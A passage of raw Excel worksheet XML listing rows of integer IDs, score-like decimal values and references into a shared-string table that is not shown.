        <v>14587</v>
      </c>
    </row>
    <row r="7373" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7373" s="1">
        <v>7371</v>
      </c>
      <c r="B7373">
        <v>5361</v>
      </c>
      <c r="C7373">
        <v>5361</v>
      </c>
      <c r="D7373">
        <v>4</v>
      </c>
      <c r="E7373">
        <v>0.81300002336502075</v>
      </c>
      <c r="F7373" t="s">
        <v>13461</v>
      </c>
      <c r="G7373" t="s">
        <v>14588</v>
      </c>
      <c r="H7373" t="s">
        <v>14589</v>
      </c>
    </row>
    <row r="7374" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7374" s="1">
        <v>7372</v>
      </c>
      <c r="B7374">
        <v>5364</v>
      </c>
      <c r="C7374">
        <v>5364</v>
      </c>
      <c r="D7374">
        <v>4</v>
      </c>
      <c r="E7374">
        <v>0.96549999713897705</v>
      </c>
      <c r="F7374" t="s">
        <v>13461</v>
      </c>
      <c r="G7374" t="s">
        <v>14590</v>
      </c>
      <c r="H7374" t="s">
        <v>14591</v>
      </c>
    </row>
    <row r="7375" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7375" s="1">
        <v>7373</v>
      </c>
      <c r="B7375">
        <v>5365</v>
      </c>
      <c r="C7375">
        <v>5365</v>
      </c>
      <c r="D7375">
        <v>4</v>
      </c>
      <c r="E7375">
        <v>0.95270001888275146</v>
      </c>
      <c r="F7375" t="s">
        <v>13461</v>
      </c>
      <c r="G7375" t="s">
        <v>14592</v>
      </c>
      <c r="H7375" t="s">
        <v>14593</v>
      </c>
    </row>
    <row r="7376" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7376" s="1">
        <v>7374</v>
      </c>
      <c r="B7376">
        <v>5366</v>
      </c>
      <c r="C7376">
        <v>5366</v>
      </c>
      <c r="D7376">
        <v>4</v>
      </c>
      <c r="E7376">
        <v>0.93519997596740723</v>
      </c>
      <c r="F7376" t="s">
        <v>13461</v>
      </c>
      <c r="G7376" t="s">
        <v>14594</v>
      </c>
      <c r="H7376" t="s">
        <v>14595</v>
      </c>
    </row>
    <row r="7377" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7377" s="1">
        <v>7375</v>
      </c>
      <c r="B7377">
        <v>5372</v>
      </c>
      <c r="C7377">
        <v>5372</v>
      </c>
      <c r="D7377">
        <v>4</v>
      </c>
      <c r="E7377">
        <v>0.60689997673034668</v>
      </c>
      <c r="F7377" t="s">
        <v>13461</v>
      </c>
      <c r="G7377" t="s">
        <v>14596</v>
      </c>
      <c r="H7377" t="s">
        <v>14597</v>
      </c>
    </row>
    <row r="7378" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7378" s="1">
        <v>7376</v>
      </c>
      <c r="B7378">
        <v>5672</v>
      </c>
      <c r="C7378">
        <v>5672</v>
      </c>
      <c r="D7378">
        <v>4</v>
      </c>
      <c r="E7378">
        <v>0.56400001049041748</v>
      </c>
      <c r="F7378" t="s">
        <v>13461</v>
      </c>
      <c r="G7378" t="s">
        <v>14598</v>
      </c>
      <c r="H7378" t="s">
        <v>14599</v>
      </c>
    </row>
    <row r="7379" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7379" s="1">
        <v>7377</v>
      </c>
      <c r="B7379">
        <v>5706</v>
      </c>
      <c r="C7379">
        <v>5706</v>
      </c>
      <c r="D7379">
        <v>4</v>
      </c>
      <c r="E7379">
        <v>0.99779999256134033</v>
      </c>
      <c r="F7379" t="s">
        <v>13461</v>
      </c>
      <c r="G7379" t="s">
        <v>14600</v>
      </c>
      <c r="H7379" t="s">
        <v>14601</v>
      </c>
    </row>
    <row r="7380" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7380" s="1">
        <v>7378</v>
      </c>
      <c r="B7380">
        <v>5383</v>
      </c>
      <c r="C7380">
        <v>5383</v>
      </c>
      <c r="D7380">
        <v>4</v>
      </c>
      <c r="E7380">
        <v>0.99970000982284546</v>
      </c>
      <c r="F7380" t="s">
        <v>13461</v>
      </c>
      <c r="G7380" t="s">
        <v>14602</v>
      </c>
      <c r="H7380" t="s">
        <v>14603</v>
      </c>
    </row>
    <row r="7381" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7381" s="1">
        <v>7379</v>
      </c>
      <c r="B7381">
        <v>5205</v>
      </c>
      <c r="C7381">
        <v>5205</v>
      </c>
      <c r="D7381">
        <v>4</v>
      </c>
      <c r="E7381">
        <v>0.95450001955032349</v>
      </c>
      <c r="F7381" t="s">
        <v>13461</v>
      </c>
      <c r="G7381" t="s">
        <v>14604</v>
      </c>
      <c r="H7381" t="s">
        <v>14605</v>
      </c>
    </row>
    <row r="7382" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7382" s="1">
        <v>7380</v>
      </c>
      <c r="B7382">
        <v>5198</v>
      </c>
      <c r="C7382">
        <v>5198</v>
      </c>
      <c r="D7382">
        <v>4</v>
      </c>
      <c r="E7382">
        <v>0.65930002927780151</v>
      </c>
      <c r="F7382" t="s">
        <v>13461</v>
      </c>
      <c r="G7382" t="s">
        <v>14606</v>
      </c>
      <c r="H7382" t="s">
        <v>14607</v>
      </c>
    </row>
    <row r="7383" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7383" s="1">
        <v>7381</v>
      </c>
      <c r="B7383">
        <v>5115</v>
      </c>
      <c r="C7383">
        <v>5115</v>
      </c>
      <c r="D7383">
        <v>4</v>
      </c>
      <c r="E7383">
        <v>0.99809998273849487</v>
      </c>
      <c r="F7383" t="s">
        <v>13461</v>
      </c>
      <c r="G7383" t="s">
        <v>14608</v>
      </c>
      <c r="H7383" t="s">
        <v>14609</v>
      </c>
    </row>
    <row r="7384" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7384" s="1">
        <v>7382</v>
      </c>
      <c r="B7384">
        <v>5123</v>
      </c>
      <c r="C7384">
        <v>5123</v>
      </c>
      <c r="D7384">
        <v>4</v>
      </c>
      <c r="E7384">
        <v>0.5964999794960022</v>
      </c>
      <c r="F7384" t="s">
        <v>13461</v>
      </c>
      <c r="G7384" t="s">
        <v>14610</v>
      </c>
      <c r="H7384" t="s">
        <v>14611</v>
      </c>
    </row>
    <row r="7385" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7385" s="1">
        <v>7383</v>
      </c>
      <c r="B7385">
        <v>5124</v>
      </c>
      <c r="C7385">
        <v>5124</v>
      </c>
      <c r="D7385">
        <v>4</v>
      </c>
      <c r="E7385">
        <v>0.6184999942779541</v>
      </c>
      <c r="F7385" t="s">
        <v>13461</v>
      </c>
      <c r="G7385" t="s">
        <v>14612</v>
      </c>
      <c r="H7385" t="s">
        <v>14613</v>
      </c>
    </row>
    <row r="7386" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7386" s="1">
        <v>7384</v>
      </c>
      <c r="B7386">
        <v>5766</v>
      </c>
      <c r="C7386">
        <v>5766</v>
      </c>
      <c r="D7386">
        <v>4</v>
      </c>
      <c r="E7386">
        <v>0.54759997129440308</v>
      </c>
      <c r="F7386" t="s">
        <v>13461</v>
      </c>
      <c r="G7386" t="s">
        <v>14614</v>
      </c>
      <c r="H7386" t="s">
        <v>14615</v>
      </c>
    </row>
    <row r="7387" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7387" s="1">
        <v>7385</v>
      </c>
      <c r="B7387">
        <v>5127</v>
      </c>
      <c r="C7387">
        <v>5127</v>
      </c>
      <c r="D7387">
        <v>4</v>
      </c>
      <c r="E7387">
        <v>0.5406000018119812</v>
      </c>
      <c r="F7387" t="s">
        <v>13461</v>
      </c>
      <c r="G7387" t="s">
        <v>14616</v>
      </c>
      <c r="H7387" t="s">
        <v>14617</v>
      </c>
    </row>
    <row r="7388" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7388" s="1">
        <v>7386</v>
      </c>
      <c r="B7388">
        <v>5130</v>
      </c>
      <c r="C7388">
        <v>5130</v>
      </c>
      <c r="D7388">
        <v>4</v>
      </c>
      <c r="E7388">
        <v>0.85790002346038818</v>
      </c>
      <c r="F7388" t="s">
        <v>13461</v>
      </c>
      <c r="G7388" t="s">
        <v>14618</v>
      </c>
      <c r="H7388" t="s">
        <v>14619</v>
      </c>
    </row>
    <row r="7389" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7389" s="1">
        <v>7387</v>
      </c>
      <c r="B7389">
        <v>5132</v>
      </c>
      <c r="C7389">
        <v>5132</v>
      </c>
      <c r="D7389">
        <v>4</v>
      </c>
      <c r="E7389">
        <v>0.49750000238418579</v>
      </c>
      <c r="F7389" t="s">
        <v>13461</v>
      </c>
      <c r="G7389" t="s">
        <v>14620</v>
      </c>
      <c r="H7389" t="s">
        <v>14621</v>
      </c>
    </row>
    <row r="7390" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7390" s="1">
        <v>7388</v>
      </c>
      <c r="B7390">
        <v>5133</v>
      </c>
      <c r="C7390">
        <v>5133</v>
      </c>
      <c r="D7390">
        <v>4</v>
      </c>
      <c r="E7390">
        <v>0.99900001287460327</v>
      </c>
      <c r="F7390" t="s">
        <v>13461</v>
      </c>
      <c r="G7390" t="s">
        <v>14622</v>
      </c>
      <c r="H7390" t="s">
        <v>14623</v>
      </c>
    </row>
    <row r="7391" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7391" s="1">
        <v>7389</v>
      </c>
      <c r="B7391">
        <v>5134</v>
      </c>
      <c r="C7391">
        <v>5134</v>
      </c>
      <c r="D7391">
        <v>4</v>
      </c>
      <c r="E7391">
        <v>0.98210000991821289</v>
      </c>
      <c r="F7391" t="s">
        <v>13461</v>
      </c>
      <c r="G7391" t="s">
        <v>14624</v>
      </c>
      <c r="H7391" t="s">
        <v>14625</v>
      </c>
    </row>
    <row r="7392" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7392" s="1">
        <v>7390</v>
      </c>
      <c r="B7392">
        <v>5204</v>
      </c>
      <c r="C7392">
        <v>5204</v>
      </c>
      <c r="D7392">
        <v>4</v>
      </c>
      <c r="E7392">
        <v>0.39719998836517328</v>
      </c>
      <c r="F7392" t="s">
        <v>13461</v>
      </c>
      <c r="G7392" t="s">
        <v>14626</v>
      </c>
      <c r="H7392" t="s">
        <v>14627</v>
      </c>
    </row>
    <row r="7393" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7393" s="1">
        <v>7391</v>
      </c>
      <c r="B7393">
        <v>5157</v>
      </c>
      <c r="C7393">
        <v>5157</v>
      </c>
      <c r="D7393">
        <v>4</v>
      </c>
      <c r="E7393">
        <v>0.4593999981880188</v>
      </c>
      <c r="F7393" t="s">
        <v>13461</v>
      </c>
      <c r="G7393" t="s">
        <v>14628</v>
      </c>
      <c r="H7393" t="s">
        <v>14629</v>
      </c>
    </row>
    <row r="7394" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7394" s="1">
        <v>7392</v>
      </c>
      <c r="B7394">
        <v>5749</v>
      </c>
      <c r="C7394">
        <v>5749</v>
      </c>
      <c r="D7394">
        <v>4</v>
      </c>
      <c r="E7394">
        <v>0.67009997367858887</v>
      </c>
      <c r="F7394" t="s">
        <v>13461</v>
      </c>
      <c r="G7394" t="s">
        <v>14630</v>
      </c>
      <c r="H7394" t="s">
        <v>14631</v>
      </c>
    </row>
    <row r="7395" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7395" s="1">
        <v>7393</v>
      </c>
      <c r="B7395">
        <v>5172</v>
      </c>
      <c r="C7395">
        <v>5172</v>
      </c>
      <c r="D7395">
        <v>4</v>
      </c>
      <c r="E7395">
        <v>0.99930000305175781</v>
      </c>
      <c r="F7395" t="s">
        <v>13461</v>
      </c>
      <c r="G7395" t="s">
        <v>14632</v>
      </c>
      <c r="H7395" t="s">
        <v>14633</v>
      </c>
    </row>
    <row r="7396" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7396" s="1">
        <v>7394</v>
      </c>
      <c r="B7396">
        <v>5176</v>
      </c>
      <c r="C7396">
        <v>5176</v>
      </c>
      <c r="D7396">
        <v>4</v>
      </c>
      <c r="E7396">
        <v>0.80900001525878906</v>
      </c>
      <c r="F7396" t="s">
        <v>13461</v>
      </c>
      <c r="G7396" t="s">
        <v>14634</v>
      </c>
      <c r="H7396" t="s">
        <v>14635</v>
      </c>
    </row>
    <row r="7397" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7397" s="1">
        <v>7395</v>
      </c>
      <c r="B7397">
        <v>5180</v>
      </c>
      <c r="C7397">
        <v>5180</v>
      </c>
      <c r="D7397">
        <v>4</v>
      </c>
      <c r="E7397">
        <v>0.9976000189781189</v>
      </c>
      <c r="F7397" t="s">
        <v>13461</v>
      </c>
      <c r="G7397" t="s">
        <v>14636</v>
      </c>
      <c r="H7397" t="s">
        <v>14637</v>
      </c>
    </row>
    <row r="7398" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7398" s="1">
        <v>7396</v>
      </c>
      <c r="B7398">
        <v>5745</v>
      </c>
      <c r="C7398">
        <v>5745</v>
      </c>
      <c r="D7398">
        <v>4</v>
      </c>
      <c r="E7398">
        <v>0.99879997968673706</v>
      </c>
      <c r="F7398" t="s">
        <v>13461</v>
      </c>
      <c r="G7398" t="s">
        <v>14638</v>
      </c>
      <c r="H7398" t="s">
        <v>14639</v>
      </c>
    </row>
    <row r="7399" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7399" s="1">
        <v>7397</v>
      </c>
      <c r="B7399">
        <v>5183</v>
      </c>
      <c r="C7399">
        <v>5183</v>
      </c>
      <c r="D7399">
        <v>4</v>
      </c>
      <c r="E7399">
        <v>0.99360001087188721</v>
      </c>
      <c r="F7399" t="s">
        <v>13461</v>
      </c>
      <c r="G7399" t="s">
        <v>14640</v>
      </c>
      <c r="H7399" t="s">
        <v>14641</v>
      </c>
    </row>
    <row r="7400" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7400" s="1">
        <v>7398</v>
      </c>
      <c r="B7400">
        <v>5184</v>
      </c>
      <c r="C7400">
        <v>5184</v>
      </c>
      <c r="D7400">
        <v>4</v>
      </c>
      <c r="E7400">
        <v>0.99849998950958252</v>
      </c>
      <c r="F7400" t="s">
        <v>13461</v>
      </c>
      <c r="G7400" t="s">
        <v>14642</v>
      </c>
      <c r="H7400" t="s">
        <v>14643</v>
      </c>
    </row>
    <row r="7401" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7401" s="1">
        <v>7399</v>
      </c>
      <c r="B7401">
        <v>5740</v>
      </c>
      <c r="C7401">
        <v>5740</v>
      </c>
      <c r="D7401">
        <v>4</v>
      </c>
      <c r="E7401">
        <v>0.89380002021789551</v>
      </c>
      <c r="F7401" t="s">
        <v>13461</v>
      </c>
      <c r="G7401" t="s">
        <v>14644</v>
      </c>
      <c r="H7401" t="s">
        <v>14645</v>
      </c>
    </row>
    <row r="7402" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7402" s="1">
        <v>7400</v>
      </c>
      <c r="B7402">
        <v>5193</v>
      </c>
      <c r="C7402">
        <v>5193</v>
      </c>
      <c r="D7402">
        <v>4</v>
      </c>
      <c r="E7402">
        <v>0.78909999132156372</v>
      </c>
      <c r="F7402" t="s">
        <v>13461</v>
      </c>
      <c r="G7402" t="s">
        <v>14646</v>
      </c>
      <c r="H7402" t="s">
        <v>14647</v>
      </c>
    </row>
    <row r="7403" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7403" s="1">
        <v>7401</v>
      </c>
      <c r="B7403">
        <v>5751</v>
      </c>
      <c r="C7403">
        <v>5751</v>
      </c>
      <c r="D7403">
        <v>4</v>
      </c>
      <c r="E7403">
        <v>0.3831000030040741</v>
      </c>
      <c r="F7403" t="s">
        <v>13461</v>
      </c>
      <c r="G7403" t="s">
        <v>14648</v>
      </c>
      <c r="H7403" t="s">
        <v>14649</v>
      </c>
    </row>
    <row r="7404" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7404" s="1">
        <v>7402</v>
      </c>
      <c r="B7404">
        <v>5109</v>
      </c>
      <c r="C7404">
        <v>5109</v>
      </c>
      <c r="D7404">
        <v>4</v>
      </c>
      <c r="E7404">
        <v>0.99500000476837158</v>
      </c>
      <c r="F7404" t="s">
        <v>13461</v>
      </c>
      <c r="G7404" t="s">
        <v>14650</v>
      </c>
      <c r="H7404" t="s">
        <v>14651</v>
      </c>
    </row>
    <row r="7405" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7405" s="1">
        <v>7403</v>
      </c>
      <c r="B7405">
        <v>5667</v>
      </c>
      <c r="C7405">
        <v>5667</v>
      </c>
      <c r="D7405">
        <v>4</v>
      </c>
      <c r="E7405">
        <v>0.56470000743865967</v>
      </c>
      <c r="F7405" t="s">
        <v>13461</v>
      </c>
      <c r="G7405" t="s">
        <v>14652</v>
      </c>
      <c r="H7405" t="s">
        <v>13742</v>
      </c>
    </row>
    <row r="7406" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7406" s="1">
        <v>7404</v>
      </c>
      <c r="B7406">
        <v>5665</v>
      </c>
      <c r="C7406">
        <v>5665</v>
      </c>
      <c r="D7406">
        <v>4</v>
      </c>
      <c r="E7406">
        <v>0.59350001811981201</v>
      </c>
      <c r="F7406" t="s">
        <v>13461</v>
      </c>
      <c r="G7406" t="s">
        <v>14653</v>
      </c>
      <c r="H7406" t="s">
        <v>14654</v>
      </c>
    </row>
    <row r="7407" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7407" s="1">
        <v>7405</v>
      </c>
      <c r="B7407">
        <v>5467</v>
      </c>
      <c r="C7407">
        <v>5467</v>
      </c>
      <c r="D7407">
        <v>4</v>
      </c>
      <c r="E7407">
        <v>0.506600022315979</v>
      </c>
      <c r="F7407" t="s">
        <v>13461</v>
      </c>
      <c r="G7407" t="s">
        <v>14655</v>
      </c>
      <c r="H7407" t="s">
        <v>14656</v>
      </c>
    </row>
    <row r="7408" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7408" s="1">
        <v>7406</v>
      </c>
      <c r="B7408">
        <v>5471</v>
      </c>
      <c r="C7408">
        <v>5471</v>
      </c>
      <c r="D7408">
        <v>4</v>
      </c>
      <c r="E7408">
        <v>0.99769997596740723</v>
      </c>
      <c r="F7408" t="s">
        <v>13461</v>
      </c>
      <c r="G7408" t="s">
        <v>14657</v>
      </c>
      <c r="H7408" t="s">
        <v>14658</v>
      </c>
    </row>
    <row r="7409" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7409" s="1">
        <v>7407</v>
      </c>
      <c r="B7409">
        <v>5480</v>
      </c>
      <c r="C7409">
        <v>5480</v>
      </c>
      <c r="D7409">
        <v>4</v>
      </c>
      <c r="E7409">
        <v>0.99839997291564941</v>
      </c>
      <c r="F7409" t="s">
        <v>13461</v>
      </c>
      <c r="G7409" t="s">
        <v>14659</v>
      </c>
      <c r="H7409" t="s">
        <v>14660</v>
      </c>
    </row>
    <row r="7410" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7410" s="1">
        <v>7408</v>
      </c>
      <c r="B7410">
        <v>5483</v>
      </c>
      <c r="C7410">
        <v>5483</v>
      </c>
      <c r="D7410">
        <v>4</v>
      </c>
      <c r="E7410">
        <v>0.43849998712539667</v>
      </c>
      <c r="F7410" t="s">
        <v>13461</v>
      </c>
      <c r="G7410" t="s">
        <v>14661</v>
      </c>
      <c r="H7410" t="s">
        <v>14662</v>
      </c>
    </row>
    <row r="7411" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7411" s="1">
        <v>7409</v>
      </c>
      <c r="B7411">
        <v>5489</v>
      </c>
      <c r="C7411">
        <v>5489</v>
      </c>
      <c r="D7411">
        <v>4</v>
      </c>
      <c r="E7411">
        <v>0.93709999322891235</v>
      </c>
      <c r="F7411" t="s">
        <v>13461</v>
      </c>
      <c r="G7411" t="s">
        <v>14663</v>
      </c>
      <c r="H7411" t="s">
        <v>14664</v>
      </c>
    </row>
    <row r="7412" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7412" s="1">
        <v>7410</v>
      </c>
      <c r="B7412">
        <v>5490</v>
      </c>
      <c r="C7412">
        <v>5490</v>
      </c>
      <c r="D7412">
        <v>4</v>
      </c>
      <c r="E7412">
        <v>0.99750000238418579</v>
      </c>
      <c r="F7412" t="s">
        <v>13461</v>
      </c>
      <c r="G7412" t="s">
        <v>14665</v>
      </c>
      <c r="H7412" t="s">
        <v>14666</v>
      </c>
    </row>
    <row r="7413" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7413" s="1">
        <v>7411</v>
      </c>
      <c r="B7413">
        <v>5492</v>
      </c>
      <c r="C7413">
        <v>5492</v>
      </c>
      <c r="D7413">
        <v>4</v>
      </c>
      <c r="E7413">
        <v>0.81779998540878296</v>
      </c>
      <c r="F7413" t="s">
        <v>13461</v>
      </c>
      <c r="G7413" t="s">
        <v>14667</v>
      </c>
      <c r="H7413" t="s">
        <v>14668</v>
      </c>
    </row>
    <row r="7414" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7414" s="1">
        <v>7412</v>
      </c>
      <c r="B7414">
        <v>5493</v>
      </c>
      <c r="C7414">
        <v>5493</v>
      </c>
      <c r="D7414">
        <v>4</v>
      </c>
      <c r="E7414">
        <v>0.99489998817443848</v>
      </c>
      <c r="F7414" t="s">
        <v>13461</v>
      </c>
      <c r="G7414" t="s">
        <v>14669</v>
      </c>
      <c r="H7414" t="s">
        <v>14670</v>
      </c>
    </row>
    <row r="7415" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7415" s="1">
        <v>7413</v>
      </c>
      <c r="B7415">
        <v>5498</v>
      </c>
      <c r="C7415">
        <v>5498</v>
      </c>
      <c r="D7415">
        <v>4</v>
      </c>
      <c r="E7415">
        <v>0.97140002250671387</v>
      </c>
      <c r="F7415" t="s">
        <v>13461</v>
      </c>
      <c r="G7415" t="s">
        <v>14671</v>
      </c>
      <c r="H7415" t="s">
        <v>14672</v>
      </c>
    </row>
    <row r="7416" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7416" s="1">
        <v>7414</v>
      </c>
      <c r="B7416">
        <v>5621</v>
      </c>
      <c r="C7416">
        <v>5621</v>
      </c>
      <c r="D7416">
        <v>4</v>
      </c>
      <c r="E7416">
        <v>0.67470002174377441</v>
      </c>
      <c r="F7416" t="s">
        <v>13461</v>
      </c>
      <c r="G7416" t="s">
        <v>14673</v>
      </c>
      <c r="H7416" t="s">
        <v>14674</v>
      </c>
    </row>
    <row r="7417" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7417" s="1">
        <v>7415</v>
      </c>
      <c r="B7417">
        <v>5500</v>
      </c>
      <c r="C7417">
        <v>5500</v>
      </c>
      <c r="D7417">
        <v>4</v>
      </c>
      <c r="E7417">
        <v>0.99839997291564941</v>
      </c>
      <c r="F7417" t="s">
        <v>13461</v>
      </c>
      <c r="G7417" t="s">
        <v>14675</v>
      </c>
      <c r="H7417" t="s">
        <v>14676</v>
      </c>
    </row>
    <row r="7418" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7418" s="1">
        <v>7416</v>
      </c>
      <c r="B7418">
        <v>5503</v>
      </c>
      <c r="C7418">
        <v>5503</v>
      </c>
      <c r="D7418">
        <v>4</v>
      </c>
      <c r="E7418">
        <v>0.95550000667572021</v>
      </c>
      <c r="F7418" t="s">
        <v>13461</v>
      </c>
      <c r="G7418" t="s">
        <v>14677</v>
      </c>
      <c r="H7418" t="s">
        <v>14678</v>
      </c>
    </row>
    <row r="7419" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7419" s="1">
        <v>7417</v>
      </c>
      <c r="B7419">
        <v>5517</v>
      </c>
      <c r="C7419">
        <v>5517</v>
      </c>
      <c r="D7419">
        <v>4</v>
      </c>
      <c r="E7419">
        <v>0.97850000858306885</v>
      </c>
      <c r="F7419" t="s">
        <v>13461</v>
      </c>
      <c r="G7419" t="s">
        <v>14679</v>
      </c>
      <c r="H7419" t="s">
        <v>14680</v>
      </c>
    </row>
    <row r="7420" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7420" s="1">
        <v>7418</v>
      </c>
      <c r="B7420">
        <v>5592</v>
      </c>
      <c r="C7420">
        <v>5592</v>
      </c>
      <c r="D7420">
        <v>4</v>
      </c>
      <c r="E7420">
        <v>0.48359999060630798</v>
      </c>
      <c r="F7420" t="s">
        <v>13461</v>
      </c>
      <c r="G7420" t="s">
        <v>14681</v>
      </c>
      <c r="H7420" t="s">
        <v>14682</v>
      </c>
    </row>
    <row r="7421" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7421" s="1">
        <v>7419</v>
      </c>
      <c r="B7421">
        <v>5538</v>
      </c>
      <c r="C7421">
        <v>5538</v>
      </c>
      <c r="D7421">
        <v>4</v>
      </c>
      <c r="E7421">
        <v>0.44389998912811279</v>
      </c>
      <c r="F7421" t="s">
        <v>13461</v>
      </c>
      <c r="G7421" t="s">
        <v>14683</v>
      </c>
      <c r="H7421" t="s">
        <v>14684</v>
      </c>
    </row>
    <row r="7422" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7422" s="1">
        <v>7420</v>
      </c>
      <c r="B7422">
        <v>5539</v>
      </c>
      <c r="C7422">
        <v>5539</v>
      </c>
      <c r="D7422">
        <v>4</v>
      </c>
      <c r="E7422">
        <v>0.55549997091293335</v>
      </c>
      <c r="F7422" t="s">
        <v>13461</v>
      </c>
      <c r="G7422" t="s">
        <v>14685</v>
      </c>
      <c r="H7422" t="s">
        <v>14686</v>
      </c>
    </row>
    <row r="7423" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7423" s="1">
        <v>7421</v>
      </c>
      <c r="B7423">
        <v>5546</v>
      </c>
      <c r="C7423">
        <v>5546</v>
      </c>
      <c r="D7423">
        <v>4</v>
      </c>
      <c r="E7423">
        <v>0.99839997291564941</v>
      </c>
      <c r="F7423" t="s">
        <v>13461</v>
      </c>
      <c r="G7423" t="s">
        <v>14687</v>
      </c>
      <c r="H7423" t="s">
        <v>14688</v>
      </c>
    </row>
    <row r="7424" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7424" s="1">
        <v>7422</v>
      </c>
      <c r="B7424">
        <v>5549</v>
      </c>
      <c r="C7424">
        <v>5549</v>
      </c>
      <c r="D7424">
        <v>4</v>
      </c>
      <c r="E7424">
        <v>0.4302000105381012</v>
      </c>
      <c r="F7424" t="s">
        <v>13461</v>
      </c>
      <c r="G7424" t="s">
        <v>14689</v>
      </c>
      <c r="H7424" t="s">
        <v>14690</v>
      </c>
    </row>
    <row r="7425" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7425" s="1">
        <v>7423</v>
      </c>
      <c r="B7425">
        <v>5553</v>
      </c>
      <c r="C7425">
        <v>5553</v>
      </c>
      <c r="D7425">
        <v>4</v>
      </c>
      <c r="E7425">
        <v>0.39379999041557312</v>
      </c>
      <c r="F7425" t="s">
        <v>13461</v>
      </c>
      <c r="G7425" t="s">
        <v>14691</v>
      </c>
      <c r="H7425" t="s">
        <v>14692</v>
      </c>
    </row>
    <row r="7426" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7426" s="1">
        <v>7424</v>
      </c>
      <c r="B7426">
        <v>5581</v>
      </c>
      <c r="C7426">
        <v>5581</v>
      </c>
      <c r="D7426">
        <v>4</v>
      </c>
      <c r="E7426">
        <v>0.69620001316070557</v>
      </c>
      <c r="F7426" t="s">
        <v>13461</v>
      </c>
      <c r="G7426" t="s">
        <v>14693</v>
      </c>
      <c r="H7426" t="s">
        <v>14694</v>
      </c>
    </row>
    <row r="7427" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7427" s="1">
        <v>7425</v>
      </c>
      <c r="B7427">
        <v>5502</v>
      </c>
      <c r="C7427">
        <v>5502</v>
      </c>
      <c r="D7427">
        <v>4</v>
      </c>
      <c r="E7427">
        <v>0.98930001258850098</v>
      </c>
      <c r="F7427" t="s">
        <v>13461</v>
      </c>
      <c r="G7427" t="s">
        <v>14695</v>
      </c>
      <c r="H7427" t="s">
        <v>14696</v>
      </c>
    </row>
    <row r="7428" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7428" s="1">
        <v>7426</v>
      </c>
      <c r="B7428">
        <v>5390</v>
      </c>
      <c r="C7428">
        <v>5390</v>
      </c>
      <c r="D7428">
        <v>4</v>
      </c>
      <c r="E7428">
        <v>0.71759998798370361</v>
      </c>
      <c r="F7428" t="s">
        <v>13461</v>
      </c>
      <c r="G7428" t="s">
        <v>14697</v>
      </c>
      <c r="H7428" t="s">
        <v>14698</v>
      </c>
    </row>
    <row r="7429" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7429" s="1">
        <v>7427</v>
      </c>
      <c r="B7429">
        <v>5460</v>
      </c>
      <c r="C7429">
        <v>5460</v>
      </c>
      <c r="D7429">
        <v>4</v>
      </c>
      <c r="E7429">
        <v>0.99129998683929443</v>
      </c>
      <c r="F7429" t="s">
        <v>13461</v>
      </c>
      <c r="G7429" t="s">
        <v>14699</v>
      </c>
      <c r="H7429" t="s">
        <v>14700</v>
      </c>
    </row>
    <row r="7430" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7430" s="1">
        <v>7428</v>
      </c>
      <c r="B7430">
        <v>5629</v>
      </c>
      <c r="C7430">
        <v>5629</v>
      </c>
      <c r="D7430">
        <v>4</v>
      </c>
      <c r="E7430">
        <v>0.94620001316070557</v>
      </c>
      <c r="F7430" t="s">
        <v>13461</v>
      </c>
      <c r="G7430" t="s">
        <v>14701</v>
      </c>
      <c r="H7430" t="s">
        <v>14702</v>
      </c>
    </row>
    <row r="7431" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7431" s="1">
        <v>7429</v>
      </c>
      <c r="B7431">
